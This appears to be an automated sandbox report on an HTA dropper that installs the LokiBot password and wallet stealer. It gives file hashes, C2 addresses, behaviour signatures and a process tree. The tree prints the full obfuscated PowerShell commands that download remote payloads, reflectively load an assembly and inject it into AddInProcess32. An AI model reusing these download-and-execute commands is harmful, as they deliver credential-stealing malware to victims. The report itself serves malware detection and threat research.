Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-10-2024 08:32

General

  • Target

    seethebestthingstobegoodwithhislifebestthigns.hta

  • Size

    130KB

  • MD5

    0b1aa8ae190d05df71f4052fae67df5b

  • SHA1

    f6fe29f3e7830b15e3b244ba83216c029dcb60fb

  • SHA256

    4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d

  • SHA512

    94008a8bf00a1334c16129258243bf89d8351c82ede845fefdb657838fe2f602f761b9935e5fef5e01b368096993f49a48e65d3705cea948d9435db0df370a04

  • SSDEEP

    96:Eam7QSo4DH5wo4DH5rtTRJP4srvjTKP4DH5Sr4DH5NFAb5UAf4DH5G7T:Ea2Rok0RLknYoVT

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

C2

http://94.156.177.220/logs/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingstobegoodwithhislifebestthigns.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\SysWOW64\WinDOWspOwershElL\v1.0\pOweRshEll.eXe
      "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1584
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lecre0u4\lecre0u4.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3688
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FFD.tmp" "c:\Users\Admin\AppData\Local\Temp\lecre0u4\CSC5C01C34BA2504F74BBCC7E946A61A79C.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4900
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3672
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1876
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1560
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              6⤵
                PID:3656
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                6⤵
                • Accesses Microsoft Outlook profiles
                • Suspicious use of AdjustPrivilegeToken
                • outlook_office_path
                • outlook_win_path
                PID:760

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOweRshEll.eXe.log

      Filesize

      2KB

      MD5

      3d086a433708053f9bf9523e1d87a4e8

      SHA1

      b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

      SHA256

      6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

      SHA512

      931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      12KB

      MD5

      f51b079b650eb031f2003682d768a419

      SHA1

      749b7047b48ec6b85abdd6018b4a4322e3d01b16

      SHA256

      eb162c639fe5ee8d1d1d76d09c1c4d6433cd937db5a249eccdc63c8d9da7fcbd

      SHA512

      3848d8f723d918c1048ecc14cea9503c0ffddbb3e43d1e4ac51e482f66f0b2edfca6df4a26dc47b298380db2f43901d80cd4a404fa6a6e0ed1bfb14b5e4cf8fb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      e2f6f0f7b65c5d871b5910b453477427

      SHA1

      46e3e9873c5d25aa6d5d035b9fd1f3ad4182ca74

      SHA256

      af2559ec26388ea649261405daa3f04b69c3e24cbfa1993c7255231086a5ca3b

      SHA512

      926ab4e8c9fa0b79dc13d648953589970f80e96b270baa26f06b6e211f4dfc9905a5f6db6d54f136bdcbcd80bc6a5ca4b9524195a3d20d2f14f3b613ac2fc67b

    • C:\Users\Admin\AppData\Local\Temp\RES7FFD.tmp

      Filesize

      1KB

      MD5

      fc7da3a35eb0b58fcc4a479ab49c11a9

      SHA1

      515ee7407bffc82c73ed054816eed533a2195271

      SHA256

      0c18bc3953a103485bd26e74936304145f2bf90856682561176f8c70a7fbf8f8

      SHA512

      c321c6e3e9e6970a98e2d61f164bff73eb2508db7ff28894fde368f117a7b74230799863f16ca766692df502991207f3c96880a8afd09623cf145b139ab17239

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y1m41yok.jdx.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\lecre0u4\lecre0u4.dll

      Filesize

      3KB

      MD5

      780abe2f882346a5fc7cb84c2468a440

      SHA1

      2edefb4a7a1fd51b00cba51d1ac43c6503c4131d

      SHA256

      76962bc5ef8d2713ea4c416aadaaf77a3232934972fbf649502d0986ce25c42e

      SHA512

      43e753c6fd40ff3c43e29904d4b645fc6f6ff64e18d4321567bd5ac2466be771ecab7d20078535ed3352718055c583e29e1ec6c747bc13cace05ccd15fb8634d

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1045960512-3948844814-3059691613-1000\0f5007522459c86e95ffcc62f32308f1_a4172161-d53d-48af-8f36-a00b057e74d4

      Filesize

      46B

      MD5

      c07225d4e7d01d31042965f048728a0a

      SHA1

      69d70b340fd9f44c89adb9a2278df84faa9906b7

      SHA256

      8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

      SHA512

      23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1045960512-3948844814-3059691613-1000\0f5007522459c86e95ffcc62f32308f1_a4172161-d53d-48af-8f36-a00b057e74d4

      Filesize

      46B

      MD5

      d898504a722bff1524134c6ab6a5eaa5

      SHA1

      e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

      SHA256

      878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

      SHA512

      26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    • C:\Users\Admin\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS

      Filesize

      136KB

      MD5

      52a69ab69d1c871566791a3c06982607

      SHA1

      367845c8b76d602680ee6069f3bde95e02c350d9

      SHA256

      4f6090a3d6a848ae3ef2310caca02976fe8448fc21cbe357f4a28a88f34ead28

      SHA512

      681b60151ef27726f8b4c9c0949a8962fa8b16fe3583ba5ee4019831b6ac2ad5bf2562da0e8fc55cdec4cb10c59a608896b9be98bedd1a8bbde43b711ee2e0c2

    • \??\c:\Users\Admin\AppData\Local\Temp\lecre0u4\CSC5C01C34BA2504F74BBCC7E946A61A79C.TMP

      Filesize

      652B

      MD5

      5921b5f9fb1c9dd681fbbe53303eaad9

      SHA1

      4b39d94564449a7e7e55631aa056b9800d429eea

      SHA256

      d1264872c46892e5348d0303ccfa89ec14469d300103fa739861cc51c964603e

      SHA512

      5bb47aec274c89975603c42d73d67dc0a8fbeac45cb81a7faa7302d4734f4e78847586fb254a8e0c463066679d92e2fec62648c666a5427fa725a9cd36987693

    • \??\c:\Users\Admin\AppData\Local\Temp\lecre0u4\lecre0u4.0.cs

      Filesize

      469B

      MD5

      de4a3e7070e220b427d460a803bf2b1b

      SHA1

      f59c55466008ca3d557cc114c01395ba724a3a32

      SHA256

      0652da0455490eaf890ddcbc122a763d5f4031a9b2825d514d105bd8ea142eae

      SHA512

      afed9ff23e8f788d80f409856741bc68e985eb0092412f91e709d917fc37ea47e43b2560313195e5c0f8facc6232ddd74e5ca38c66d16af31d5f7b4984999b85

    • \??\c:\Users\Admin\AppData\Local\Temp\lecre0u4\lecre0u4.cmdline

      Filesize

      369B

      MD5

      9d5bb2a3fc019cfd9ad585b234737c88

      SHA1

      9194ba7bb9c338536934239cdf3aeefee51c7275

      SHA256

      738c4b4a3102d5eb7ce4af555832af6a57cbcdf52350ee623ab1b78cd4a50283

      SHA512

      e8c7259057717d089f76b5563e2ebf710bd148d43fb84f3dc0373c09eedc0df36878c1c21f97b86906b1f2a1215ca577bdf214241993c647aa8e0c0832a8e5ac

    • memory/760-103-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/760-136-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/760-128-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/760-104-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/1164-6-0x0000000004FB0000-0x0000000005016000-memory.dmp

      Filesize

      408KB

    • memory/1164-75-0x00000000712E0000-0x0000000071A90000-memory.dmp

      Filesize

      7.7MB

    • memory/1164-3-0x0000000005070000-0x0000000005698000-memory.dmp

      Filesize

      6.2MB

    • memory/1164-1-0x0000000002430000-0x0000000002466000-memory.dmp

      Filesize

      216KB

    • memory/1164-80-0x00000000712E0000-0x0000000071A90000-memory.dmp

      Filesize

      7.7MB

    • memory/1164-4-0x0000000004D70000-0x0000000004D92000-memory.dmp

      Filesize

      136KB

    • memory/1164-74-0x00000000712EE000-0x00000000712EF000-memory.dmp

      Filesize

      4KB

    • memory/1164-2-0x00000000712E0000-0x0000000071A90000-memory.dmp

      Filesize

      7.7MB

    • memory/1164-0-0x00000000712EE000-0x00000000712EF000-memory.dmp

      Filesize

      4KB

    • memory/1164-5-0x0000000004E10000-0x0000000004E76000-memory.dmp

      Filesize

      408KB

    • memory/1164-18-0x0000000005DE0000-0x0000000005E2C000-memory.dmp

      Filesize

      304KB

    • memory/1164-17-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

      Filesize

      120KB

    • memory/1164-16-0x00000000058A0000-0x0000000005BF4000-memory.dmp

      Filesize

      3.3MB

    • memory/1164-64-0x0000000006370000-0x0000000006378000-memory.dmp

      Filesize

      32KB

    • memory/1164-70-0x0000000007170000-0x0000000007192000-memory.dmp

      Filesize

      136KB

    • memory/1164-71-0x0000000008020000-0x00000000085C4000-memory.dmp

      Filesize

      5.6MB

    • memory/1560-101-0x0000000007360000-0x00000000074BA000-memory.dmp

      Filesize

      1.4MB

    • memory/1560-102-0x00000000074C0000-0x000000000755C000-memory.dmp

      Filesize

      624KB

    • memory/1584-29-0x000000006DBA0000-0x000000006DBEC000-memory.dmp

      Filesize

      304KB

    • memory/1584-42-0x0000000007570000-0x000000000758A000-memory.dmp

      Filesize

      104KB

    • memory/1584-47-0x00000000077B0000-0x00000000077C4000-memory.dmp

      Filesize

      80KB

    • memory/1584-46-0x00000000077A0000-0x00000000077AE000-memory.dmp

      Filesize

      56KB

    • memory/1584-39-0x0000000006870000-0x000000000688E000-memory.dmp

      Filesize

      120KB

    • memory/1584-28-0x0000000006830000-0x0000000006862000-memory.dmp

      Filesize

      200KB

    • memory/1584-49-0x0000000007890000-0x0000000007898000-memory.dmp

      Filesize

      32KB

    • memory/1584-45-0x0000000007770000-0x0000000007781000-memory.dmp

      Filesize

      68KB

    • memory/1584-44-0x00000000077F0000-0x0000000007886000-memory.dmp

      Filesize

      600KB

    • memory/1584-43-0x00000000075E0000-0x00000000075EA000-memory.dmp

      Filesize

      40KB

    • memory/1584-48-0x00000000078B0000-0x00000000078CA000-memory.dmp

      Filesize

      104KB

    • memory/1584-41-0x0000000007BB0000-0x000000000822A000-memory.dmp

      Filesize

      6.5MB

    • memory/1584-40-0x0000000007470000-0x0000000007513000-memory.dmp

      Filesize

      652KB

    • memory/1876-90-0x0000000005F90000-0x00000000062E4000-memory.dmp

      Filesize

      3.3MB